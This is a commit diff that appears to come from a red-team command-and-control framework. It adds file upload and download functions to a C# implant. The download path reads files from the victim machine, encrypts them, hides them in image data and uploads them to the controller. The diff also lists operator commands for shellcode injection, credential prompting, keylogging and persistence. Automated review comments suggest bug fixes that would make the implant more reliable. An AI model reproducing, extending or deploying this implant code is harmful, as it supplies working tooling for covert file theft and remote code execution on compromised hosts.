Added upload-file & download-file to C# Implant

chunking
benpturner 2018-12-31 17:22:58 +00:00
parent 0b6a31a035
commit a576952f47
3 changed files with 96 additions and 54 deletions


@ -102,28 +102,33 @@ public class Program
}
static string Encryption(string key, string un, bool comp = false)
static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
{
var b = System.Text.Encoding.UTF8.GetBytes(un);
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
byte[] b = null;
if (unByte != null) {
b = unByte;
} else {
b = System.Text.Encoding.UTF8.GetBytes(un);
}
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
}
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV)
@ -328,7 +333,6 @@ public class Program
foreach (string c in split)
{
output = "";
//add download-file
//add upload-file
if (c.ToLower().StartsWith("loadmodule")){
@ -336,6 +340,28 @@ public class Program
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output += "Module loaded sucessfully";
}
if (c.ToLower().StartsWith("upload-file")){
string path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase);
string[] splitargs = path.Split(new string[] {";"}, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
byte[] fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
}
if (c.ToLower().StartsWith("download-file")){
string path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase);
byte[] file = File.ReadAllBytes(path.Replace("\"", ""));
byte[] fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
string dtask = Encryption(Key, c);
string dcoutput = Encryption(Key, "", true, fileChuck);
byte[] doutputBytes = System.Convert.FromBase64String(dcoutput);
byte[] dsendBytes = GetImgData(doutputBytes, stringnewIMGS);
GetWebRequest(dtask).UploadData(URL, dsendBytes);
}
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
@ -351,10 +377,11 @@ public class Program
sc = sc.Replace("\"", "");
scode = sc;
}
if (c.ToLower().StartsWith("run-exe")){
if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe")){
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
int i = 0;
string method = "";
string splittheseargs = "";
string qualifiedname = "";
string name = "";
@ -365,8 +392,17 @@ public class Program
if (i == 2){
name = a;
}
if (i > 2){
splittheseargs = splittheseargs + " " + a;
if (c.ToLower().StartsWith("run-exe")) {
if (i > 2){
splittheseargs = splittheseargs + " " + a;
}
} else {
if (i == 3){
method = a;
}
if (i > 3){
splittheseargs = splittheseargs + " " + a;
}
}
i ++;
}
@ -376,7 +412,7 @@ public class Program
foreach (var arg in splitnewargs) {
myList.Add(arg);
}
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
@ -384,33 +420,14 @@ public class Program
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try {
if (c.ToLower().StartsWith("run-exe")) {
var xxx = loadedType.Assembly.EntryPoint.Invoke(null, new object[] { myList.ToArray() });
output = xxx.ToString();
} catch { }
}
}
}
if (c.ToLower().StartsWith("run-dll")){
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
string qualifiedname = splitargs[1];
string name = splitargs[2];
string method = splitargs[3];
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.InvokeMethod, null, null, null);
output = xxx.ToString() + stringOutput.ToString();
} catch (Exception e) {
var xxx = e;
output = xxx.ToString() + stringOutput.ToString();
}
} else {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { myList.ToArray() });
output = xxx.ToString();
}
} catch { }
}
}
}
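Review bot: In the new `upload-file` branch, `splitargs[1]` is read without checking that the split on `;` produced two parts, and the "Uploaded file to:" message is written before `System.IO.File.WriteAllBytes` runs, so a malformed task raises an index error and a failed write is still reported as done. Guard the branch with `if (splitargs.Length >= 2)` and emit the message only after the write has returned. The merged `run-dll`/`run-exe` block also ends in `catch { }`, whereas the removed `run-dll` branch put `e.ToString()` into `output`, so a failed `InvokeMember` call now produces no output at all; `catch (Exception e) { output = e.ToString(); }` would keep the earlier behaviour. The enclosing `foreach` starts and ends outside these hunks, so whether an outer handler catches these exceptions is not visible here.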


@ -62,6 +62,8 @@ run-dll Seatbelt.Program Seatbelt UserChecks
start-process net -argumentlist users
inject-shellcode c:\\windows\\system32\\svchost.exe <optional-ppid-spoofid>
inject-shellcode 1453 <optional-ppid-spoofid>
download-file "c:\\temp\\test.exe"
upload-file -source /tmp/test.exe -destination "c:\\temp\\test.exe"
kill-implant
hide-implant
unhide-implant
@ -403,4 +405,4 @@ COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomd
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
SHARPCOMMANDS = ["get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential","testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir","inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]
SHARPCOMMANDS = ["upload-file","download-file","get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential","testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir","inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]


@ -506,7 +506,30 @@ def runcommand(command, randomuri):
for line in helpfull:
if searchterm in line:
print (line)
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
args = argp(command)
try:
if args:
with open(args.source, "rb") as source_file:
s = source_file.read()
source = base64.b64encode(s)
if s:
destination = args.destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (args.source, destination))
if (args.nothidden):
uploadcommand = "upload-file%s;\"%s\"" % (source, destination)
else:
uploadcommand = "upload-file%s;\"%s\"" % (source, destination)
new_task(uploadcommand, randomuri)
except Exception as e:
print ("Error with source file: %s" % e)
traceback.print_exc()
elif "unhide-implant" in command.lower():
unhide_implant(randomuri)
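Review bot: Both arms of `if (args.nothidden):` assign the same string to `uploadcommand`, so the flag has no effect on the task that is queued. Either collapse the conditional to a single `uploadcommand = "upload-file%s;\"%s\"" % (source, destination)` or add a comment such as `# nothidden is accepted but not implemented for this implant type` so the dead branch is not mistaken for working behaviour. `runcommand` begins and continues outside this hunk and indentation is lost in this rendering, so whether `new_task` can be reached with `uploadcommand` unassigned (empty source file or no parsed args) cannot be confirmed from here.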